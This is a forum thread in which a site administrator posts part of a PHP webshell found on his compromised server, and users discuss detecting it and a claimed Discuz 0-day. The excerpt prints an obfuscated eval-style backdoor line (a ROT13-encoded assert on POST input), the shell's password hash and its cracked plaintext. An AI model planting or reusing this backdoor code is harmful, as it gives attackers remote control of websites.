全球主机交流论坛

标题: 可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、... [打印本页]

作者: 蓝洛水深 时间: 2018-10-8 15:08
标题: 可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、...
本帖最后由蓝洛水深于 2018-10-8 16:17 编辑

<?php
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
ini_set('max_execution_time',0);
ini_set('memory_limit','8000M');
define('PASSWD','b55901cdec0d09c45e4766f4a62bee40');/*默认是admin，MD5加密方式*/
define('VERSION','Bypass Waf Php Script(可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、以及冷门Waf、市面所有后门检测工具');
define('THISFILE',str_replace(array('\\','//'),array('/','/'),__FILE__));
define('THISDIR',dirname(THISFILE).'/');
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/');
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");
$pBVzO57KOVp='ID8+PD9waHAgZn

(, 下载次数: 304)

b55901cdec0d09c45e4766f4a62bee40
解密后
qianjunlin33

最近收到各种木马，一个比一个强，头大
360、百度、云锁，已经确认都没有用

已经查到一个攻击IP
您查询的IP:198.1.175.249
本站数据：美国
参考数据1：美国加利福尼亚州洛杉矶 serveryou.com
参考数据2：美国
兼容IPv6地址：::C601:AFF9
映射IPv6地址：::FFFF:C601:AFF9
和对方服务提供商进行了工单投诉，对这家不熟，不知道哪位大佬熟悉

作者: vava 时间: 2018-10-8 15:16
都是能绕过最新版的安全软件吗

作者: 蓝洛水深 时间: 2018-10-8 15:20

vava 发表于 2018-10-8 15:16
都是能绕过最新版的安全软件吗

我把其中一个样本上传了

作者: Jestom 时间: 2018-10-8 15:23
提示: 作者被禁止或删除内容自动屏蔽

作者: doing 时间: 2018-10-8 15:25
加密的，可能还有后门

作者: 蓝洛水深 时间: 2018-10-8 15:26

doing 发表于 2018-10-8 15:25
加密的，可能还有后门

嗯，有一句话那些，也有图片，一次比一次好，我都收藏了

作者: cheshirex 时间: 2018-10-8 15:44

D盾可以扫出来

作者: mslxd 时间: 2018-10-8 15:46
这个后门是什么原理

作者: 蓝洛水深 时间: 2018-10-8 16:02

cheshirex 发表于 2018-10-8 15:44
D盾可以扫出来

扫不干净，不然也不会30号17点修复，21又被修改

作者: 蓝洛水深 时间: 2018-10-8 16:40

mslxd 发表于 2018-10-8 15:46
这个后门是什么原理

discuz的0day

作者: bob1987 时间: 2018-10-8 16:46
提示: 作者被禁止或删除内容自动屏蔽

作者: 蓝洛水深 时间: 2018-10-8 17:17

bob1987 发表于 2018-10-8 16:46
我觉得一句话好找，关键漏洞难找，你首先要能上传啊。。

我找到了，discuz的0day，创始人密码这里

作者: jshkk 时间: 2018-10-8 17:34

蓝洛水深发表于 2018-10-8 17:17
我找到了，discuz的0day，创始人密码这里

求姿势·~~~

作者: hlsk 时间: 2018-10-8 17:44

蓝洛水深发表于 2018-10-8 17:17
我找到了，discuz的0day，创始人密码这里

能详说下吗

作者: 便宜，买买买 时间: 2018-10-8 17:55
这个帖子的完整标题是什么？？？？？？？嗯哼？

欢迎光临全球主机交流论坛 (https://fd.vvwvv.eu.org/)